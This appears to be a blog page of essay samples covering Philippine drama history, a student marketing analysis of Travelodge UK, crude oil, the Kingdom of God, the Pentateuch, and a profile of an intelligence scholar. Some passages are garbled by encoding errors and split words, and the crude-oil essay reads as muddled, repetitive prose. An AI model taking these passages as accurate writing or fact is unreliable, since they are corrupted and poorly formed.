Saturday, August 31, 2019

History of Drama

History of Drama * Spanish Period 1. Tibag * â€Å"to excavate† * St. Helena’s search for the cross 2. Lagaylay – Pilarenos of Sorsogon get together during Maytime 3. Cenaculo – passion and death of Christ a. Cantada – chanted like pasion b. Hablada – rhythmic measure of words in a deliberate manner * Spanish Period 4. Panunuluyan – Mary & Joseph searching for refuge before Christ’s birth – presented before 12mn on Christmas eve 5. Salubong – during easter (Mary meets risen Christ) 6. Carillo (shadow play) – form of entertainment performed during a moonless night or a dark night after a harvest 7.Zarzuela – 1st Philippine drama. Musical comedy or melodrama. Has 3 acts of man’s passion & emotion (love, hate, revenge, cruelty, avarice or social/political problems) 8. Sainete – short musical comedy (18th century) – exaggerated comedies performed by characters from lower class family (indio) – theme: taken from everyday life scenarios * American Period 1. Severino Reyes – father of Tagalog drama – Walang Sugat 2. Aurelio Tolentino – a Kapampangan dramatist * Luhang Tagalog = masterpiece * Kahapon, Ngayon, at Bukas = resulted to his incarceration 3.Hermogenes Ilagan – from Central Luzon – he founded the group Campana Ilagan *Severino Reyes and Hermogenes Ilagan started the movement against the moro-moro (play against muslims) * Japanese Period * Characterized by stage shows because movie houses were closed *organization of Filipino players (Dramatic Filipinos) 1. Jose Ma. Hernandez – Panday Pira 2. Francisco Soc Rodrigo – Sa Pula sa Puti 3. Clodualdo del Mundo – Bulaga 4. Julian Cruz Balmaceda * Sino ba Kayo? * Dahil sa Anak * Higante ng Patay * Period of New Society (Modern) reviving old plays/dramas 1977 – Tales of Manuvu (new style of rock of the ballad opera) – Performed by Celeste L egaspi, Lea Navarro, Hadji Alejandro, Boy Canara, Anthony Castello & Rey Dizon – choreographed by Atic Reyes Sining Embayoka (CCP) – from Mindanao State University *Development of play 1. PETA (Philippine Educational Theater Association) – Cecille Guidote & Lino Brocka 2. Repertory Philippines – Rebecca Godines & Zenaida Amador 3. UP Repertory – Behn Cervantes 4. Teatro Filipino – Rolando Tinio

Friday, August 30, 2019

Travelodge

Travelodge Travelodge is private hospitality industry. The Travelodge brand was founded by Scott King (Travelodge Corporation Founder) from America. And the first Travelodge was established in San Diego in 1940. Travelodge has several hotel chains around the world and many of them are operated under independent companies without having connection with brand operating in other countries. Travelodge in UK Travelodge in UK was founded in 1985 which brand was bought in 1980 by the same person Lord Forte. It is the first budget hotel brand and now the fastest growing hotel company.Currently Travelodge is serving all over the UK and in Republic of Ireland and Spain. Travelodge has become second largest budget hotel brand and third biggest hotel chain in UK as it contains approximately 26,148 rooms’ within 368 hotels. And since August 2006, till now Travelodge in UK is operated under Dubai International Capital. Newly designed rooms are decorated in new buildings and refurbished hote ls. Every Travelodge in UK contain family rooms, double rooms and disabled rooms. Each rooms feature en-suite bathroom and heater attached in lower wall.Free tea and coffee with kettle is available on attached table. Wi-Fi internet connection is available at all hotels with the small charge add. Whereas for food and beverage there is bar cafe and vending machine in those almost every hotel except very old ones which are very near to other restaurant. These are overall facilities and other more are there. Situation Analysis PEST Political Analysis The rules and regulation is being changing very frequently for the international students which will affect the daily purpose of the Travelodge. Because than half of the workers are international students inTravelodge. But due to the changing rules and regulation, the under graduate students don’t get work permit from 2012 and those workers must leave the job at once. Last time when there was a great festival of Nepalese people the 5 0% of Travelodge in UK were in shortage of housekeepers because most of those international workers and students went back to there country for celebrating their festival. So the changing regulation might affect the smoothness of Travelodge because more than half of the workers are international students in almost every Travelodge.Economical Analysis Economically Travelodge is in very good situation as it is fastest growing hotel and is providing the room in low price. This year Travelodge is proving various special discount offers in every month. Just this March, Travelodge provide a room in ? 10 per night. And Travelodge in UK is also adding 3000 room per year which shows their economic situation is quite good. Social Analysis Nowadays the peoples travel more due to the availability and flexibility of the Travelodge. Their living style is changing as they can afford the hotel rooms.Travelodge has become the needy facility and services in society due to the cheapness, flexibility a nd mobility of it. Technical Analysis Online reservation system is very famous in Travelodge. 80% of booking is made online in Travelodge. The room’s door is opened with car key. Even check-in and check-out can be done in machine inside the Travelodge. Advance online payment is most famous and profitable for both the Travelodge and customers. SWOT Strength In present situation, Travelodge in London is considered as fastest growing hotel chain.It is providing good services like online reservation, excellent customer services plus quality food services. Special disability access rooms are available for handicapped guest. Due to it’s availability in most of the places there is no transportation problems. Good car parking system is provided by Travelodge. Plus point the rooms are cheaper. And the company brand is famous through out famous countries like America, Canada, Australia, etc. Travelodge in UK is providing the room in cheapest price where there are no other compet ators in that matter. WeaknessThere’s no room service in Travelodge and there is no refund policy after the reservation is made. Sometimes there is shortage of workers. And there is problem in personal development of junior staffs. Travelodge also lacks party place. Some workers might be good in work but lack the communication skills. Though the hotel is growing faster, its facilities are stable still. There are no any new promotions. Due to the increasing number of Travelodge there seems to be lacking of marketing expert. Opportunities Travelodge should must make some party place and function rooms.More permanent workers should be collected and hire more marketing experts. With various offers the promotion and advertising is needed. And as being responsible of their workers, Travelodge must fight against the changing rules and regulation. And being in Growth stage, the right place must be filled with Travelodge with proper plan. Threats The changing rules and regulation of U KBA is making hard for more than half of workers in Travelodge as many of them are not going to get the work permit from this coming 2012. And maximum numbers of workers in Travelodge are par time workers including those international students.Premier Inn has more number of hotels and rooms than the Travelodge and it’s only the one which has largest budget hotel brand even being founded after Travelodge. And right now Premier Inn has made the Travelodge second in budget hotel brand. Seasonality Travelodge in UK are very busy in summer. Most of the every people in the UK have holidays from their work in summer season. And in this season it’s favorable for them to travel. Due to cheap and sweet facilities of Travelodge, almost every those travelers prefer more to spend their nights in Travelodge.They visit the place whole day and to spend night there is availability of Travelodge in most every place. Travelodge can be found in most of every famous place. And nowadays the holiday travelers travel many places rather than spending whole holiday by traveling in one place. It’s easy to switch the Travelodge anywhere within the UK for travelers because of its availability. So Travelodge seems abit busy than usual. The traveling to the beach in the summer is very famous in UK. In comparison it’s found that these years more number of UK residents are traveling within the UK than traveling outer country.Where the Travelodge grab the chance to attract the customers and become successful due to it’s reasonable facilities for guest. It has become most flexible for the travelers traveling within the UK. It’s just opposite in winter. Travelodge keeps running but not as much as usual because the people in UK prefer to stay inside home being warm in this season. Whole UK is full of snow in winter season. So most of every peoples do not travel around rather than staying home being warm. Travelodge is quite in this season. So winter seaso n is considered as off pick season of Travelodge in UK;Travelodge occupancy is average in other seasons. This same trend goes every year. And in weekly basis, Travelodge in UK seems busy in the weekend than in weekdays. Product Lifecycle Introduction Growth Maturity Decline [pic] Fig :- Product Lifecycle of Travelodge in UK The figure above shows that, there is Four Stage in Product Lifecycle of Travelodge in UK. In Introduction stage there is one product, limited place and penetrating situation. The size of Market and Growth is very slight and the competition is very few.The marketing cost is high in this stage to test the market. Moreover in this stage it's hard to gain more profit. So in this stage the product must be carefully monitored to ensure the product development or market development. This is necessary because it’s the stage where the business is starting from zero level. Gain awareness is the main marketing objective in this stage. Secondly in Growth stage there is more versions of product and more outlets and start gaining market and cost of product is reduced. The competition is more.The demand increases so the product too, and the sales increases dramatically in this stage. Stress differentiation is the main marketing objective in this stage. Thirdly in Maturity stage there is full product line and maximum outlets. There are many more competitors and every companies fight for market share. It is stage when the high profit is earned by market as a whole. In this stage both marketing and finance become key activities. Pricing is forwarded defending the market share and profit. And the main marketing objective in this stage is maintaining brand loyalty.Lastly in Decline stage there are only best sellers. The competition goes down to normal. Every company tries to stay profitable and promotional activities are quite silent. The profit keeps reducing so the final stage of company is indicated in this stage. The product management is done very carefully to control the amount of stock of the product. In present situation, Travelodge in UK is in Growth stage. Rising profitability is one of the indicators of Travelodge being in Growth stage. Due to the increasing competition Travelodge has reduced the price of room according to the guest’s early booking time. More the advance you booked the room , more the cheaper you will find the room in Travelodge’. And in the present condition sales volume is increasing very significantly. Due to increasing sales volume Travelodge in UK is in process of adding more outlets. It is gaining market share and promotion is automatically increasing. In over all we can say that there is rapid in sales and profit. Travelodge in UK is increasing it’s availability by building more Travelodge. In other words the product lines of Travelodge in UK are widening. Its main reason is because of increasing profit and competition. Marketing ReportGeographically the Travelodge in UK is segmented within whole UK focusing more around the Central London. Few of them are can be found in Country side. Numbers of Travelodge in UK are constructed according to the density. Numbers of Travelodge’s are established inside and around the Central London to make it available within short distance of travel. And wherever the density is high, Travelodge with more rooms is constructed over there. Famous places in the country side are focused and Travelodge are constructed over there. Demographic segmentation is done in Travelodge focusing to the different family sizes.Travelodge in UK are available with family rooms, double rooms and disable rooms where the family rooms are managed separately with different set up for single person, two person or couple, family with one child, family with two child, etc. Same way the double rooms are also managed with different set up for single person and two people. Families with different age can enjoy the Travelodge rooms up to four peo ple. Different rooms are segmented according to the floor and mostly disable rooms are available in ground floor which makes it easy and fast to move to disable peoples.Pshychographically Travelodge is established focusing the social class. According to the location the price of room differs in Travelodge. And to make it affordable for everyone, Travelodge is available with various discount offers. . Travelodge in UK is grabbing the guest while they are in holiday. Every weekend there is holiday for the almost every official worker or any other workers. So Travelodge get busy in weekend. And mainly it is found around the busy places. It is made affordable in such a way that, regular customer, light customer or heavy customer everybody can afford it. Product of Travelodge in UKThe main product of Travelodge in UK is clean room to provide lodging service. And as a side facilities bar cafe is available for food and beverages. As hospitality industry, Travelodge in UK mainly focus for t he guests who are seeking for spending there nights outside. For which Travelodge is available with fresh cleaned rooms. Rooms are with limited facilities according to the number of guest to be inside room. The main things in Double room are like, King size double bed with small attached furniture and dim light. And attached furnished small and big wardrobe with table where LCD TV is also attached on the table.Tea, coffee, sugar and milk packs are arranged in cuddy according to number of guest. Kettle with cups and spoon are sorted on a side of attached table. En-suite attached bathroom is available inside room. Small bins are kept under the table and inside the bathroom. Heater for winter season is attached in lower side of a wall. Breakfast menu, Main menu and Wi-Fi menu are arranged on the table just below the big mirror on the table. Finally the needed linens are fixed inside the room. Similarly the main things in Family room are as same like in Double room but are abit bigger i n size and one sofa is added with single bed under it.More number of wardrobe and single duvets are kept as per the number of guest. And sofa can be converted into single bed and under it there is another single bed. And disabled room is also with the same facilities as in double room but are bigger in size as Family room. Bathroom is bigger than in Family and Double room with special arrangements to make easy for handicapped ones. Bed can be separated into two parts if it’s difficult to the disable guest. And there is one rope to pull for emergency help which alarm’s immediately to the reception after pulling it.Room is as bigger as family room but there is no sofa because of which it is abit wider and easy to move for the handicapped guest. There are other different facilities like daily cleaning the room even if the guests are staying over. More number of pillow, duvets, etc are available for free. And many other services like iron, baby cot, hair dryer, etc are ava ilable with small charge. Even Wi-Fi internet connection facility is also available here with small amount of charge. Bar cafe is there beside the reception for food and beverages. And the vending machine for chocolate, water and cold drinks are available.Pricing Strategy Travelodge in UK is using Skimming strategy. In statistics it’s called riding down demand curve. [pic] Fig:- Skimming Price of Room of Travelodge in UK. The figure above shows the present pricing strategy condition of Travelodge in UK. The X axis is room price whereas Y axis is Quantity of Room. And the curve in the middle that’s the Demand curve of room which is increasing. Lower the price, higher the demand is shown clearly by the figure. In past years rooms of Travelodge in UK used to cost higher than now because it was only the hotel chain with highest budget within the UK.The other reasons are that Travelodge was new hotel in UK and was in its beginning stage. But these years the competitors have arrived. And the usage of Travelodge is increasing day by day. So nowadays the price of room goes like this; If the guest booked the room in seven days advance then it cost ? 29. If they booked the room twenty-one days advance then it will cost only ? 19. For walk-in guest it cost more than ? 45. Generally starting room price is ? 15 for Double room. And also that Travelodge charge the price per room but not per person. According to the season the different offers comes with amazing lower prices.And now Travelodge is renowned as the cheapest hotel in the UK. It is focusing the every type of middle class and normal guest. Travelodge in UK is providing the room in very lower price with very limited and reasonable facilities. Price differs according to the guest behavior. Advance booking and Booking on same day makes the difference in room price. And little amount of charge is asked for other small services like wi-fi, baby cot, etc. The reasons for using such pricing strategies are a s follows: 1. To keep the hotel busy. 2. To compete in market. 3. To maximize the demand. 4. To stay in profit. 5.To satisfy the guest and travelers. Promotion of Travelodge in UK Travelodge in UK promote itself through advertisement. They advertise through various means every time when they bring the new offer. Advertisements are conducted through TV channels, Newspapers and Internet. Even a huge flex just around every Travelodge (? 19 – steal the room) is displayed clearly. Public awareness is in process itself automatically as far as Travelodge can be found in most of every place within and around the London city. There is increasing awareness in public due to its flexibility services and its various discount offer.It is necessary to promote through channels as far as TV has been one of the daily needs in this 21st century. Similarly, it’s same with newspapers which we can see in every peoples hand mostly in the morning time. And through internet, the whole world ca n search and find out about it in details. And the flex around it makes people to know about its cheap room price. Here the URL link is given which directly shows the latest TV advertisement: http://www. youtube. com/user/MrSleepZzzSquad For more you can visit Mr Sleep & the Zzz Squad channel in website called www. youtube. comDistribution Channel Travelodge in UK has direct distribution strategy. The customer is guest and the product is room. As soon as the customers checked-in, they will get a card key, this directly let them inside the room. The rooms are cleaned by the housekeepers and are supervised by supervisor. The new linens enter inside the Travelodge everyday and same way the dirty linens are separated in cage to send it to laundry. The rooms are checked properly after it’s cleaned. Now a product is ready. This product is directly handed to the customer by the Travelodge after the guest paid for it.There is no complicated distribution strategy in Travelodge. It dir ectly hands the product to the customer. Branding Branding is really very important to this organization. ‘Travelodge’ is the brand name which signifies the every Travelodge in UK wherever they are. Travelodge brand name was founded in America but now it’s already been in UK, Canada, Australia, Ireland and Spain. These hotel chains are of same brand name even if it’s under the other independent companies. Yes, we can say its brand name is important because even though it’s controlled by different independent organizations, the brand name is same everywhere.This brand is international brand. ‘Travelodge’ brand name itself is the combination of word travel and lodge. This also means the house where we can stay while we travel. This brand name directly attracts the travelers even from it’s name. Strategic Planning Travelodge need to increase the number of rooms within the busy areas without changing the room price offers of present situation. Travelodge in UK is right now in growth stage. Due to increasing demand Travelodge have great opportunities to upgrade. In my opinion, I think it’s time to increase the number of Travelodge choosing the busy area.The lower price room with safety lodging is everybody’s demand. Travelodge is very suitable for that. More other Travelodge near the famous place must be established. Travelers traveling inside the nation are increasing in UK and for that more rooms must be created in busy destinations. The changing rules and regulation is pushing back the under graduated international students to their own country. And most of every Travelodge in UK are filled with international student’s part time workers. So for this, the fulltime workers with work permit must be searched to replace them.Right these days Travelodge in UK is having very reasonable price for room i. e. , ? 19 if booked in 21 days advance. This offer is amazing that more than 85% of rooms are sold out through online booking in 21 days advance. This offer must be going on. Strategic Aims of Travelodge in UK Travelodge in UK has step up with aggressive growth strategy. As Travelodge is in Growth Stage, it is looking for adding the 3000 rooms per year and 10000 rooms within 3 years. In this coming Olympic 2012, the maximum hotels will be very busy and Travelodge is also going to be one of them. So for that, more rooms are being constructed.It is already press released that 20 new hotels in capital is going to be established with 3500 new rooms for upcoming Olympic 2012. And 750 new jobs will be offered as planned. Travelodge in UK is coming up with more ambitious plans growing its brand name significantly and has already covered the republic areas of Ireland and Spain. It is growing rapidly by choosing the area with strong domestic tourism market. And in this upcoming year 2012 the decoration and furniture inside room is changed to new style ones. The LCD TV is on the tabl e will be on wall in 2012. And other new changes are also arranged.A new biggest low cost hotel called London CityRoad Travelodge is already in release and has five meeting rooms. Travelodge in Heathrow Terminal 5, Euston and Southwark with total 699 rooms is already done. This is established because Heathrow Terminals are going to be busy in coming Olympic year. And there is noticed free shuttle service within the Travelodge of those 5 terminals in Heathrow Airport. The main motive is that everybody would prefer to spend their night under ? 30. Travelodge in UK is already working for 2012 Development Programme with Flagship London Hotel Opening.A new product called Kipshaw is also already introduced by Travelodge in UK. It’s a bicycle rickshaw with complete attached single bed with mattress, duvet and pillow. This service right now is only available in London CityRoad Travelodge and is in process of spreading. SMART objectives Specific Travelodge in UK is growing aggressivel y under certain strategies. It is increasing 3000 rooms per year. It specifies that within upcoming year Travelodge in UK increases 20 more hotels. In total 3500 rooms will be added within Olympic 2012. And it’s also creating job opportunities.It is also specifying to be the biggest hotel brand within the Olympic 2012. There upcoming target is fully linked with Olympic 2012. Measurable The plan to increase numbers of hotel can be measured according to the project starting and ending time. It also depends in counting of how many projects are under process. And it also can be done by estimating the project contract period. For example – there was a project to be finished within six months to construct 3 hotels in Heathrow Terminal 5, Euston and Southwark with 699 total rooms and was successful. AchievableThey are achievable since it’s carried out in many places at once. And also The Flagship London Hotel Opening is helping them for this 2012 development project. I t is moreover almost completed. And it’s becoming fast because some new Travelodge’s are acquired one. Like Chaucher hotel is now going to be converted into 60 rooms Travelodge. Realistic It is in smooth under process as far as 2012 is coming nearer. But it wasn’t that complicated because this project was started from 2007. So every developments are being conducted slowly by estimating the proper time and plan.No longer period is needed to complete it. Flagship London Hotel Opening assist to Travelodge in UK from the very first of this development plan. Time This set objective is to be achieved before the 2012 Olympic starts. Within the starting of Olympic the Travelodge will be success to achieve its target. And seeking the chance Travelodge in UK is in target to gain the name of biggest hotel brand by running together with the Olympic 2012. Ansoff Matrix [pic] http://www. marketingteacher. com/lesson-store/lesson-ansoff. html Fig :- Ansoff MatrixHere in above the figure, we can see there are four strategies in Ansoff Matrix. The first one is Market Penetration where we market our existing product in existing market to customers. It’s also a stage of productivity. We promote our product to increase the revenue with present product. It can be break down into different product and different segments to know in which segment there is market growth or market share growth. After that there’s nothing to do within the Market Penetration to grow the sales and profit. The second one may be any of it among Product Development, Market Development and Diversification.In Product Development strategy, new products are introduced in existing market. It’s done by updating the existing products by changing some features and its looks. Those products replacing the older ones are marketed to existing customers to increase the profit. And In Market Development, the products are not changed but the existing product is introduced in the ne w market. This means to introduce the existing product to new customers by widening the market. It is done by exporting the product and marketing in new region. Lastly Diversification means to be completely in the new market with new product.The Diversification is of two types and are Related Diversification and Unrelated Diversification. Related Diversification means to be diversified in the business which is familiar to previous one. For e. g. – to be diversified from bus business to rail business. Whereas Unrelated Diversification means to be diversified in completely unfamiliar business. For e. g. – to be diversified from noodles business to cloth business. It’s explained more clearly in this video: http://www. youtube. com/user/OxfordLearningLab#p/a/u/0/AORoMxgp428 Among these strategies, the Market Development Strategy is most suitable for the Travelodge in UK.It is suitable because the price quoted by the Travelodge in UK is very reasonable one comparing to the service and facilities that it provides. And the occupancy rate is almost always full i. e. more than 85%. The room price is very cheaper than the other hotels all over the UK and available with sweet service. The many peoples, guest and travelers are attracted to Travelodge and the main reason behind it is that it cost less than ? 30. Most of every customer and travelers in Travelodge are to sleep tight and have safety. So, the product should not be changed inside the Travelodge and its rate of room must be stable.The price of product must remain same to challenge the competitors and to be forward in the market. Whereas the existing product should find new market. The market area must be wide and introduce the same existing product to every other new customer. It should do as it has done in the Republic of Spain and Ireland. Travelodge in UK must wide it’s market internally as well as externally in my view. Keeping the Product Development stable and increasing the Mar ket Development widely seems to be most suitable for the development of the future of the Travelodge in UK. Market Research of Travelodge in UKAccording to the DJS Research Ltd, â€Å"Market Research is a systematic, objective collection and analysis of data about a particular target market, competition, and/or environment. It always incorporates some form of data collection whether it be secondary research (often referred to as desk research) or primary research which is collected direct from a respondent. † Purpose of Research The main purposes of research are as follows: -To find out what’s the satisfaction level of customers with the services of Travelodge. -To find out which aspects of the service makes them happy and which aspect doesn’t make them happy.Both the primary and secondary research must be done to find out the as a whole outcome of Travelodge in UK Firstly let’s outline the stages of marketing research. 1st – Identifying the target group estimating the size of sample for meaningful outcome 2nd – Recruiting, screening and selecting target sample 3rd – Designing Survey questionnaire or guide 4th – Hiring and Training data collection team 5th – Checking and cleaning the data 6th – Analyzing the data and studying the findings (last stage) Identifying the target group estimating the size of sample for meaningful outcomeThere are more than two hundreds of Travelodge in UK. So I think in every Travelodge the occupied costumers must be made as target rather than asking outside pedestrians. This should be done with the customers in and out from Travelodge because outside customers haven’t experienced it yet to tell their satisfaction level. It’s just a waste of time and budget if we do it in society. But doing it inside the Travelodge without missing the customers saves the time and budget. The customer who has already left the hotel must be kept in link by saving there e-mail address.And every customer inside the hotel must be asked without filtering the customers. Each and every customer must be listed in target list. The sample size may differ among the Travelodge’s but is doesn’t matter as far as the number of rooms in them also vary. Recruiting, screening and selecting target sample Travelodge mostly is busy in the weekend and mostly in the weekdays, it’s not so busy. So the research should be done as a whole week occupying customers. The every customer but only the ones inside the hotel must be listed in target. And they should be researched either while they stay more or just before they leave.As far as we are doing everything inside the hotel, every check-in and check-out must be checked and observed properly and manage the sample in time. It is necessary because in Travelodge the some guest may leave without informing. Even the used rooms must be observed to know that how they have used the product. The targets should not be forced if they don’t want to participate. Designing Survey questionnaire or guide For collecting the primary data the questions must be asked to the existing customers about their preferences with the service and about their expenses made on it.The customers should be made easy and free feel to reply while in the process. Hard questions and unnecessary questions should not be asked. The questions must be limited and must meet the objective with its answers. The questions must in both the interview-administered form and self-administered form. Interview-administered form is for the customers inside the hotel whereas self-administered form is for the customers who are linked through the internet. The questions should be framed correctly by avoiding ambiguous words, personal questions and other negative questions.Questions must be sorted in easy way form. Firstly classification question secondly list question thirdly rating and lastly open-ended question. Some of questio n examples are written below: And they can be used as both Interview-administered form and Self-administered form. Classification question Age 18 or under 18 19 to 25 26 to 40 41 to 60 61 over Sex Male Female Members in your room of hotel 1 2 3 4 5 or more List Questions . Why did you choose Travelodge? (Tick all that apply) Cheap Facilities Flexible Comfort Other (please specify) †¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦Ã¢â‚¬ ¦.. Which of these services you enjoyed inside Travelodge? (Tick all that apply) Sleeping Bathing Eating Extra service like wi-fi, baby cot, hair dryer, iron, etc. Daily cleaning service Rating Questions: How good do you feel Travelodge services? Very good Quite good Neither good nor bad Quite bad Very bad Open-ended Questions: What do you think about our services? Is it your first time? If then how did you know about Travelodge? What did you like most about Travelodge?Do you have any feedbacks and any recommendation? I f then you can say and suggest without hesitation? Hiring and Training data collection team A separate team should be made to do the research. The active ones with good speaking and smooth fluent communicator must be there. Somebody may not know English, so for them the writing sheet must be prepared in different language. And we can translate those later on. No. of teams must be arrange according to the size of Travelodge. They should be trained properly before starting the research. Data collection methods and process should be clearly mentioned while training.Here now research is done in field, starting primary research according to guide and with the help of trained team. Weekly progress also must be drawn in chart for future purpose. Checking and cleaning the data The collected data must be re-checked and re-arranged. The mistakes in data must be corrected and should be ready by arranging it systematically. The data should be true where fault data should not be mixed. It should be easy to read and understand. The fresh data will be prepared from it. Analyzing the data and studying the findings . The fresh prepared data are inspected, transformed and modeled in this last process.This process concludes the answers of the objectives of individual Travelodge. Now finally, the secondary research starts where the every analyzed data are collected in headquarter of Travelodge in UK located at Thame, England UK. Then, main data analysis is done here to know the answers of the research. This way we can achieve the objectives of our research. ———————– X Room Sales and Profit O Y Stage of Product Life Cycle Total Industry room sales Total Industry Profit O Price of Room Quantity of Room Y X Decreasing Price due to increasing demand Demand

Thursday, August 29, 2019

A Crude Awakening to a Ceaseless Dependency in Oil

Crude Oil: It penetrates investor's mind and is increasingly contributing to their fatal dependence. Crude oil: Although it is low cost, it costs money in terms of war, loss of life, and social, social and economic confusion. Crude Oil: We are trying to own Black Gold. What was the beginning of a new traditional product is now a support system for all people. It creates a fantasy that completely changes life, a life without work, a free life, which is the spirit of anesthesia, a vague vision, a source of corruption. Quality in the sea One barrel of crude oil is a hard asset. Even if you are not in the oil industry, you can exchange the oil barrel in the market and exchange goods. However, the value of crude oil is not essential. Hundreds of years ago, before the invention of an engine that could use oil as a fuel, the value of crude oil was zero. One day, if the solar energy becomes cheap enough, the value of crude oil may approach zero again. At the same time, fluctuations in crude oil prices are influenced by current supply-demand situation and prediction of future supply-demand situation. Crude oil, commonly referred to as petroleum, is a liquid on the earth, composed of hydrocarbons, organic compounds, and small amounts of metal. Hydrocarbon is usually the main component of crude oil, its composition varies depending on the type of crude oil and extraction method, but it varies between 50% and 97%. Organic compounds such as nitrogen, oxygen and sulfur normally make up 6% to 10% of the crude oil and metals such as copper, nickel, vanadium and iron account for less than 1% of the total composition. Crude oil is the most common petroleum product in spilled oil. Crude oil is a complex mixture of hydrocarbons and small amounts of sulfur, oxygen, nitrogen, and minor amounts of inorganic and organometallic compounds. There are three kinds of hydrocarbons, alkane, alkene, and aromatic. Low concentrations of alkanes can cause anesthesia and anesthesia as well as hi gh concentrations of cell damage and death in marine invertebrates. Olefins are usually not included in crude oil, but are included in refined products such as gasoline. Gasoline is more toxic than alkane, but it is less toxic than aromatic. Aromatic hydrocarbons are not common in nature, but they kill marine organisms not only at maximum intensity but also at dilute concentrations. Aromatic hydrocarbons are the most direct toxic component in oils (Boesch, Hershmer et al., 1974).

Wednesday, August 28, 2019

Jesus and Kingdom of God Assignment Example | Topics and Well Written Essays - 250 words

Jesus and Kingdom of God - Assignment Example In order to develop a better understanding, it may be suitable to analyze some of the Beatitudes. Thus, in Matthew chapter 5 verse 8 it was pointed out that those who are â€Å"pure in heart† will enter the Kingdom of Heaver. It is quite obvious that the above mentioned concept is synonymous to ethical decision making. Another concept which is analyzed in the next verse, namely peacemaking, reflects the ethical principle of refraining from violence and avoiding conflict between people. There is no doubt that this contributes to harmony in the world and is greatly values by Christianity. Finally, the high significance of mercy is states in the previous verse. As one can easily see, the idea of Kingdom of God stands for an environment of moral individuals who exercise highest ethical values such as refraining from violence or mercy on other people. That is why the above mentioned concept should be seen as an ethical

Tuesday, August 27, 2019

Summary of The Pentateuch (From SOURCES GIVEN by me) Essay

Summary of The Pentateuch (From SOURCES GIVEN by me) - Essay Example These instructions are less explicit than the law sections of the books, and as such are open to interpretation. Despite the fact that these first five books of the Bible are known as the "five books of Moses", he is not considered the sole author. This label is more of a Jewish tradition; however the sections which are considered by Biblical scholars to be the oldest are also thought to have been authored by Moses. These sections include Exodus 21-23, the "Book of the Covenant" (Exodus 24-28), Numbers 33, Deuteronomy 5-21, and the Ten Commandments. Overall, it may be more accurate to say that the creation of the Pentateuch was inspired by Moses rather than it actually having been written by him. The Pentateuch is thought to be a compilation of documents created at different times in the history of the Israelites. The Pentateuch as it is known today was not compiled earlier than the fifth century B.C.E. There are a number of opinions concerning the date of origin of Pentateuch documents; the most widely accepted of these was formulated by Julius Wellhausen in the nineteenth century. According to this theory, a document known as "J" (Jahwist) is the oldest known written source, written in the ninth century B.C.E. The "E" document (Elohist) was written in the eighth century, and these two sources were edited into one in the seventh century. Deuteronomy dates from 621 B.C.E. and was added in the sixth century. Around 400 B.C.E., the last document, known as the Priestly Work, was added. Alternative theories include the possibility that the J document is actually the youngest of the four rather than the oldest. Recent work has developed theories on the intent of the authors of these works. Overall, it is thought that the main intent was to use their presentations of Israel's traditional history to convey important messages. For example, the Jahwist document addresses the "age of Solomon" and urges Israelites to live in accordance with the commands of Abraham of Genesis. The Elohist document urges Israelites to shun foreign cults, the book of Deuteronomy emphasizes the importance of the unity of Israel, and the Priestly Work emphasizes the authenticity of Israel's religious and cultural traditions. Another analytical technique is a "form-critical" approach which examines the literary forms (for example moral story, saga, or tale) of the books to determine their role in every day life. This approach reconstructs the historical background in which the documents were written. An analysis by Martin Noth detected five major themes of the Pentateuch: God's promise to the Israelites, their exodus from Egypt, their time spent in the wilderness, the giving of God's law, and His guidance in the Israelites new land. A third technique which examines oral composition and transmission of the Pentateuch writings questions the idea of the Pentateuch as a primarily written document. The book of Genesis can be seen as an oral composition which reflects several different influences (due to differences in representation and small discrepancies in detail). Themes The last four books of the Pentateuch, which follow Moses from birth to death, are part of a strong narrative theme. However, to regard the Pentateuch as

Monday, August 26, 2019

Corn farmers Essay Example | Topics and Well Written Essays - 500 words

Corn farmers - Essay Example As per the law of demand and supply of economics, lesser demand of corn will push the price of corn down ward to an extent so that equilibrium in demand and supply reaches. Individual corn farmers will thus face the state of lesser demands then previously what they had catered to. The market of corn can be assumed as perfectly competitive for the following reasons. 1. There are large producers and suppliers of corn in the market. It means that each producer is too small compared to the entire market to influence price by its own supply. 2. Corn Market has bountiful suppliers with standardized products. Buyers perceive them all identical. 3. Buyers have perfect information available about the prices of corn producers. 4. There are no entry or exit barriers for the firms in the long run; market is always open for competition for new suppliers. 5. The market is said to have reached in long run equilibrium by 2014 and in a perfectly competitive state as the marginal firm makes a normal p rofit in the long run. Since market of corn is nearly perfectly competitive, any reduction in demand or increase in its supply will push the price down ward so as to find a new equilibrium of demand and supply during 2016 and beyond. (Kindly refer Appendix I) Above happening is bounded by certain assumptions, which are enumerated as per the following. a.

Intelligence profile Essay Example | Topics and Well Written Essays - 1000 words

Intelligence profile - Essay Example A graduate of Carleton University (B.A.) and the University of Western Ontario (M.B.A., Ph.D.), Dr. Calof focuses his research and publications on international competitive intelligence. 3. Professor Calof focuses his research on international competitive intelligence and the application of knowledge for innovation. A director of the Canadian Institute of Competitive Intelligence, Jonathan has given over 500 speeches, seminars and keynote addresses around the world on competitive intelligence and has helped several of Canada's largest companies and government agencies enhance their intelligence capabilities. In recognition of his contribution to the competitive intelligence field, Jonathan was presented with the Society of Competitive Intelligence Professional's (SCIP) Catalyst award. Jonathan Calof has more than 100 publications to his credit. He is the co-author of "Competitive Intelligence - Keys to Success" and has contributed to several books. He has also published articles in j ournals such as Competitive Intelligence Review, Journal of International Business Studies, Business Quarterly, International Journal of Small Business Management, International Business Review. As well, Dr. Calof has been given awards and honours from several academic associations, including the Academy of Business Administration, the International Council for Small Business - South Africa, the Administrative Sciences Association of Canada, and the Academy of International Business. His case, Sterling Marking Product's, was recognized for being one of the top 10 cases sold by the Ivey School of Business in 1998 and his article For King and For Country on competitive intelligence was selected as being among the best articles in Business Quarterly. Interest in his work has also resulted in several interviews on radio and in print in Canada, United States, United Kingdom, South Africa and New Zealand. He has been featured in such publications as the National Post and the Globe and Mai l, as well as being featured on Canada A.M (CTV), As It Happens (CBC) and Global News. Detailed Profile 1. Dr. Calof is recognized as one of the leaders in intelligence and business insight. An associate professor of International Business and Strategy at the Telfer School of Management at University of Ottawa, Dr. Calof combines research and consulting in competitive intelligence, technical foresight and management insight in the creation of the Universities management insight program. As well, he is a Board member for CASIS (Canadian Association of Security and Intelligence Studies), is on the advisory board for the Algonquin College intelligence analyst program, and is also co-director of the Foresight Synergy Network. 2. An article in the Edmontonian called him "one of the world leaders in competitive intelligence". While CA Magazine (Charters Accountants) described him as "a highly sought after, as a consultant, by businesses and government agencies.† 3. Throughout all th ese activities Jonathan is passionate about 